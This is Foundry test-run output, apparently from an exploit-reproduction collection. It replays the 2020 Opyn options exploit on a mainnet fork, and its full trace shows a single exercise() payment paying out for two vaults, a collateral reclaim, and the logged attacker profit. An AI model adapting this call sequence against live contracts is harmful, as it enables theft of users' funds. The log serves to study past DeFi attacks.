Compiling 23 files with Solc 0.8.17
Solc 0.8.17 finished in 1.24s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23866)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7953] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23866] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 579.51ms (2.00ms CPU time)

Ran 1 test for src/test/2020-08/Opyn_exp.sol:ContractTest
[PASS] test_attack() (gas: 214568)
Logs:
  Attacker USDC balance before is     68504
  ------EXPLOIT-----
  Attacker USDC balance after is      78404
  Attacker profit is                   9900

Traces:
  [5795] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 10592516 [1.059e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [268368] ContractTest::test_attack()
    ├─ [0] VM::startPrank(0xe7870231992Ab4b1A01814FA0A599115FE94203f)
    │   └─ ← [Return]
    ├─ [10075] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0xe7870231992Ab4b1A01814FA0A599115FE94203f) [staticcall]
    │   ├─ [2789] 0x0882477e7895bdC5cea7cB1552ed914aB157Fe56::balanceOf(0xe7870231992Ab4b1A01814FA0A599115FE94203f) [delegatecall]
    │   │   └─ ← [Return] 68504683582 [6.85e10]
    │   └─ ← [Return] 68504683582 [6.85e10]
    ├─ [0] console::log("Attacker USDC balance before is    ", 68504 [6.85e4]) [staticcall]
    │   └─ ← [Stop]
    ├─ [0] console::log("------EXPLOIT-----") [staticcall]
    │   └─ ← [Stop]
    ├─ [88427] 0x951D51bAeFb72319d9FBE941E1615938d89ABfe2::addERC20CollateralOption(300000000 [3e8], 9900000000 [9.9e9], 0xe7870231992Ab4b1A01814FA0A599115FE94203f)
    │   ├─ [24732] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transferFrom(0xe7870231992Ab4b1A01814FA0A599115FE94203f, 0x951D51bAeFb72319d9FBE941E1615938d89ABfe2, 9900000000 [9.9e9])
    │   │   ├─ [23937] 0x0882477e7895bdC5cea7cB1552ed914aB157Fe56::transferFrom(0xe7870231992Ab4b1A01814FA0A599115FE94203f, 0x951D51bAeFb72319d9FBE941E1615938d89ABfe2, 9900000000 [9.9e9]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: 0xe7870231992Ab4b1A01814FA0A599115FE94203f, to: 0x951D51bAeFb72319d9FBE941E1615938d89ABfe2, value: 9900000000 [9.9e9])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xa7de0fbd8211dd57f0e72c25df70586784daaafbb9c6c50833f6c8f5cd4db3e3: 0x0000000000000000000000000000000000000000000000056bc75e0f3c42d100 → 0x0000000000000000000000000000000000000000000000056bc75e0cee2cce00
    │   │   │   │   @ 0xc5a6b828022d51414381dd2c22491bb5dd944bfafe721d938918631145532e17: 0x0000000000000000000000000000000000000000000000000000000ff332843e → 0x0000000000000000000000000000000000000000000000000000000da51c813e
    │   │   │   │   @ 0x894619dcbdcfda3ef694e1d934197426bb39b61dc8e72ea0f1450b8013cab6dc: 0x000000000000000000000000000000000000000000000000000000198875bb24 → 0x0000000000000000000000000000000000000000000000000000001bd68bbe24
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ emit ERC20CollateralAdded(: 0xe7870231992Ab4b1A01814FA0A599115FE94203f, : 9900000000 [9.9e9], : 0xe7870231992Ab4b1A01814FA0A599115FE94203f)
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0xe7870231992Ab4b1A01814FA0A599115FE94203f, value: 300000000 [3e8])
    │   ├─ emit IssuedOTokens(: 0xe7870231992Ab4b1A01814FA0A599115FE94203f, : 300000000 [3e8], : 0xe7870231992Ab4b1A01814FA0A599115FE94203f)
    │   ├─  storage changes:
    │   │   @ 0x3c1cf7239c08d1790678c45daf5e3f61e06809f9afc4e5f21234db715e06bf57: 0 → 0x0000000000000000000000000000000000000000000000000000000011e1a300
    │   │   @ 0x3c1cf7239c08d1790678c45daf5e3f61e06809f9afc4e5f21234db715e06bf56: 0x0000000000000000000000000000000000000000000000000000000008583b00 → 0x00000000000000000000000000000000000000000000000000000002566e3e00
    │   │   @ 3: 0x00000000000000000000000000000000000000000000000000000000c5d2592d → 0x00000000000000000000000000000000000000000000000000000000d7b3fc2d
    │   │   @ 0xc9cfca99eafff439aa5e8929bd206f5cf26567b09cc938209563b71cd9350164: 0x0000000000000000000000000000000000000000000000000000000012307acc → 0x0000000000000000000000000000000000000000000000000000000024121dcc
    │   └─ ← [Stop]
    ├─ [120348] 0x951D51bAeFb72319d9FBE941E1615938d89ABfe2::exercise{value: 30000000000000000000}(600000000 [6e8], [0xe7870231992Ab4b1A01814FA0A599115FE94203f, 0x01BDb7Ada61C82E951b9eD9F0d312DC9Af0ba0f2])
    │   ├─ emit Transfer(from: 0xe7870231992Ab4b1A01814FA0A599115FE94203f, to: 0x0000000000000000000000000000000000000000, value: 300000000 [3e8])
    │   ├─ [5405] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transfer(0xe7870231992Ab4b1A01814FA0A599115FE94203f, 9900000000 [9.9e9])
    │   │   ├─ [4616] 0x0882477e7895bdC5cea7cB1552ed914aB157Fe56::transfer(0xe7870231992Ab4b1A01814FA0A599115FE94203f, 9900000000 [9.9e9]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: 0x951D51bAeFb72319d9FBE941E1615938d89ABfe2, to: 0xe7870231992Ab4b1A01814FA0A599115FE94203f, value: 9900000000 [9.9e9])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x894619dcbdcfda3ef694e1d934197426bb39b61dc8e72ea0f1450b8013cab6dc: 0x0000000000000000000000000000000000000000000000000000001bd68bbe24 → 0x000000000000000000000000000000000000000000000000000000198875bb24
    │   │   │   │   @ 0xc5a6b828022d51414381dd2c22491bb5dd944bfafe721d938918631145532e17: 0x0000000000000000000000000000000000000000000000000000000da51c813e → 0x0000000000000000000000000000000000000000000000000000000ff332843e
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ emit Exercise(: 30000000000000000000 [3e19], : 9900000000 [9.9e9], : 0xe7870231992Ab4b1A01814FA0A599115FE94203f, : 0xe7870231992Ab4b1A01814FA0A599115FE94203f)
    │   ├─ emit Transfer(from: 0xe7870231992Ab4b1A01814FA0A599115FE94203f, to: 0x0000000000000000000000000000000000000000, value: 300000000 [3e8])
    │   ├─ [11005] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transfer(0xe7870231992Ab4b1A01814FA0A599115FE94203f, 9900000000 [9.9e9])
    │   │   ├─ [10216] 0x0882477e7895bdC5cea7cB1552ed914aB157Fe56::transfer(0xe7870231992Ab4b1A01814FA0A599115FE94203f, 9900000000 [9.9e9]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: 0x951D51bAeFb72319d9FBE941E1615938d89ABfe2, to: 0xe7870231992Ab4b1A01814FA0A599115FE94203f, value: 9900000000 [9.9e9])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x894619dcbdcfda3ef694e1d934197426bb39b61dc8e72ea0f1450b8013cab6dc: 0x000000000000000000000000000000000000000000000000000000198875bb24 → 0x000000000000000000000000000000000000000000000000000000173a5fb824
    │   │   │   │   @ 0xc5a6b828022d51414381dd2c22491bb5dd944bfafe721d938918631145532e17: 0x0000000000000000000000000000000000000000000000000000000ff332843e → 0x000000000000000000000000000000000000000000000000000000124148873e
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ emit Exercise(: 30000000000000000000 [3e19], : 9900000000 [9.9e9], : 0xe7870231992Ab4b1A01814FA0A599115FE94203f, : 0x01BDb7Ada61C82E951b9eD9F0d312DC9Af0ba0f2)
    │   ├─  storage changes:
    │   │   @ 3: 0x00000000000000000000000000000000000000000000000000000000d7b3fc2d → 0x00000000000000000000000000000000000000000000000000000000b3f0b62d
    │   │   @ 0x3c1cf7239c08d1790678c45daf5e3f61e06809f9afc4e5f21234db715e06bf57: 0x0000000000000000000000000000000000000000000000000000000011e1a300 → 0
    │   │   @ 0x6d95dbc0f33764d92248e03d3aced068b45a9b9300a7d842aee562fbfeadc1b7: 0x000000000000000000000000000000000000000000000000000000037e11d600 → 0x000000000000000000000000000000000000000000000000000000012ffbd300
    │   │   @ 0xc9cfca99eafff439aa5e8929bd206f5cf26567b09cc938209563b71cd9350164: 0x0000000000000000000000000000000000000000000000000000000024121dcc → 0x00000000000000000000000000000000000000000000000000000000004ed7cc
    │   │   @ 0x3c1cf7239c08d1790678c45daf5e3f61e06809f9afc4e5f21234db715e06bf58: 0 → 0x000000000000000000000000000000000000000000000001a055690d9db80000
    │   │   @ 0x6d95dbc0f33764d92248e03d3aced068b45a9b9300a7d842aee562fbfeadc1b9: 0 → 0x000000000000000000000000000000000000000000000001a055690d9db80000
    │   │   @ 0x6d95dbc0f33764d92248e03d3aced068b45a9b9300a7d842aee562fbfeadc1b8: 0x000000000000000000000000000000000000000000000000000000001b17d02e → 0x0000000000000000000000000000000000000000000000000000000009362d2e
    │   │   @ 0x3c1cf7239c08d1790678c45daf5e3f61e06809f9afc4e5f21234db715e06bf56: 0x00000000000000000000000000000000000000000000000000000002566e3e00 → 0x0000000000000000000000000000000000000000000000000000000008583b00
    │   └─ ← [Stop]
    ├─ [11697] 0x951D51bAeFb72319d9FBE941E1615938d89ABfe2::removeUnderlying()
    │   ├─ [2269] 0xe7870231992Ab4b1A01814FA0A599115FE94203f::fallback{value: 30000000000000000000}()
    │   │   └─ ← [Stop]
    │   ├─ emit RemoveUnderlying(: 30000000000000000000 [3e19], : 0xe7870231992Ab4b1A01814FA0A599115FE94203f)
    │   ├─  storage changes:
    │   │   @ 0x3c1cf7239c08d1790678c45daf5e3f61e06809f9afc4e5f21234db715e06bf58: 0x000000000000000000000000000000000000000000000001a055690d9db80000 → 0
    │   └─ ← [Stop]
    ├─ [1575] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0xe7870231992Ab4b1A01814FA0A599115FE94203f) [staticcall]
    │   ├─ [789] 0x0882477e7895bdC5cea7cB1552ed914aB157Fe56::balanceOf(0xe7870231992Ab4b1A01814FA0A599115FE94203f) [delegatecall]
    │   │   └─ ← [Return] 78404683582 [7.84e10]
    │   └─ ← [Return] 78404683582 [7.84e10]
    ├─ [0] console::log("Attacker USDC balance after is     ", 78404 [7.84e4]) [staticcall]
    │   └─ ← [Stop]
    ├─ [0] console::log("Attacker profit is                  ", 9900) [staticcall]
    │   └─ ← [Stop]
    ├─  storage changes:
    │   @ 0xc9cfca99eafff439aa5e8929bd206f5cf26567b09cc938209563b71cd9350164: 0x0000000000000000000000000000000000000000000000000000000012307acc → 0x0000000000000000000000000000000000000000000000000000000024121dcc
    │   @ 0xc5a6b828022d51414381dd2c22491bb5dd944bfafe721d938918631145532e17: 0x0000000000000000000000000000000000000000000000000000000ff332843e → 0x000000000000000000000000000000000000000000000000000000124148873e
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 17.46s (16.20s CPU time)

Ran 2 test suites in 18.34s (18.04s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
